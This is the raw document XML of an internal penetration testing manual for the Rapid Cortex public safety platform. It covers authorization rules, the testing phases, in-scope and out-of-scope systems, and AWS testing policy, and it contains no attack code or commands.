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after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">RAPID CORTEX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A4D7A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Intelligence at the speed of response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="7C3AED" w:sz="4"/>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING MANUAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="9B91BB"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RC-SEC-PENTEST-001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="5A4D7A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Version 1.0  |  July 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="EF4444" w:sz="2"/>
          <w:bottom w:val="single" w:color="EF4444" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="FFF5F5" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EF4444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFIDENTIAL — INTERNAL USE ONLY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7F1D1D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  Do not distribute outside Rapid Cortex</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="5A4D7A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apps on Demand LLC d/b/a Rapid Cortex</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9B91BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorized use only — unauthorized testing is a federal offense under 18 U.S.C. § 1030 (CFAA)</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Document Control</w:t>
      </w:r>
    </w:p>
    <w:p>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7200"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720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Details</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Document Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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Rapid Cortex Penetration Testing Manual</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Document ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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RC-SEC-PENTEST-001</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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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1.0</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Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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CONFIDENTIAL — Internal Use Only</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Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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Rapid Cortex Security Engineering</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Last Updated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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July 2026</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Review Cycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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Annually or after any significant platform change</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Approved By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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CTO / VP Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Version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1440"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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1.0</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July 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>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Security Engineering</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Initial release — all seven test categories, CJIS alignment, RC-specific attack surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="EF4444" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="FFF5F5" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EF4444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ WARNING: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7F1D1D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This document contains detailed offensive security techniques. It is authorized for use by Rapid Cortex security engineers and contracted penetration testing firms only. Unauthorized use of any technique described herein against systems you do not own or have explicit written permission to test is a criminal offense under the Computer Fraud and Abuse Act (18 U.S.C. § 1030) and the Electronic Communications Privacy Act (18 U.S.C. § 2511).</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Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This manual defines the penetration testing program for the Rapid Cortex public safety intelligence platform. Rapid Cortex processes sensitive emergency communications data for 911 dispatch centers, law enforcement, fire rescue, EMS, and emergency management agencies. Many customers operate under CJIS Security Policy requirements, which mandates security assessments including penetration testing for systems that access Criminal Justice Information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This manual covers seven core penetration testing disciplines plus additional testing areas specific to the Rapid Cortex technical stack. Each section defines the objective, methodology, tooling, Rapid Cortex-specific attack surface, and pass/fail criteria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing Objectives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Identify vulnerabilities before threat actors do</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Validate CJIS Security Policy compliance (Section 5.10 — Security Assessment)</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Verify RBAC role isolation across all nine Rapid Cortex roles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Confirm cross-tenant data isolation — no agency can access another agency's data</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Validate API authentication and authorization on all endpoints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Test the Ring OAuth integration against certification requirements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Confirm QR/NFC public endpoint hardening</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Validate CAD integration security boundary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Confirm billing and pricing data is protected from unauthorized access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing Phases Overview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0"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="3960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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When</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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Who</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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1. SAST + Dependency Scan</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Static</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Every PR / CI pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Internal (Claude Code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2. Network Port Scanning</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Dynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>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Pre-pilot, quarterly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Internal or contracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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3. Active Exploitation</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Dynamic</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Pre-pilot, bi-annually</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Contracted firm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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4. Session Hijacking</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Dynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>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Pre-pilot, bi-annually</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Contracted firm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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 Social Engineering</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Human</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Pre-enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Contracted firm only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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6. Physical Access Testing</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Physical</w:t>
            </w:r>
          </w:p>
        </w:tc>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Pre-enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Contracted firm only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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7. Runtime Memory Analysis</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Dynamic</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Pre-enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Contracted firm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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8. Zero-Day Discovery</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Research</w:t>
            </w:r>
          </w:p>
        </w:tc>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Continuous / bug bounty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Internal + researchers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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9. API Security Testing</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Dynamic</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Every release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Internal or contracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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10. Cloud Infrastructure</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Static + Dynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>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Quarterly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Internal or contracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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11. RBAC + Tenant Isolation</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Dynamic</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Every release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Legal Authorization and Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="EF4444" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="FFF5F5" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EF4444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ WARNING: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7F1D1D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No penetration testing activity may begin without a signed Rules of Engagement (ROE) document and explicit written authorization from Rapid Cortex leadership. This applies to both internal security engineers and contracted firms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Before any test begins, the following must be in place:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Signed Penetration Test Authorization Form (RC-SEC-AUTH-001)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Defined scope document listing all in-scope systems, IP ranges, and domains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Out-of-scope systems explicitly listed (production agency data is always out of scope)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency contact list — who to call if a test causes an outage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Start and end dates with daily testing windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Notification to AWS (required for network scans against AWS infrastructure)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Notification to any affected agency customers (for social engineering tests)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NDA executed with any contracted testing firm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope Definition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always In Scope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Staging environment — api-staging.rapidcortex.us, app-staging.rapidcortex.us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Development environment — api-dev.rapidcortex.us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RC team test accounts and test agency tenants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RC-owned AWS accounts (with AWS pen test notification)</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Marketing site — www.rapidcortex.us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Ring integration endpoints — /api/integrations/ring/*</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QR/NFC ingest endpoint — /api/report/* (with synthetic test codes only)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CAP ingest endpoint — /api/cad/cap/ingest/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always Out of Scope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Production agency data — any real dispatch center's incidents, recordings, or PII</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AWS infrastructure shared with other customers (EC2 hypervisor layer, etc.)</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Third-party systems not owned by Rapid Cortex (Ring's servers, Amazon servers)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DoS/DDoS attacks of any kind — even against staging</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Physical access testing of AWS data centers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Social engineering of agency customer employees without their agency's written consent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS Penetration Testing Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS permits penetration testing of customer-owned resources without prior approval for the following services: EC2, RDS, Lambda, API Gateway, CloudFront, Aurora, and Elastic Beanstalk. Network stress testing, DNS zone walking, and port flooding require AWS approval via the AWS Vulnerability Reporting form.</w:t>
      </w:r>
    </w:p>
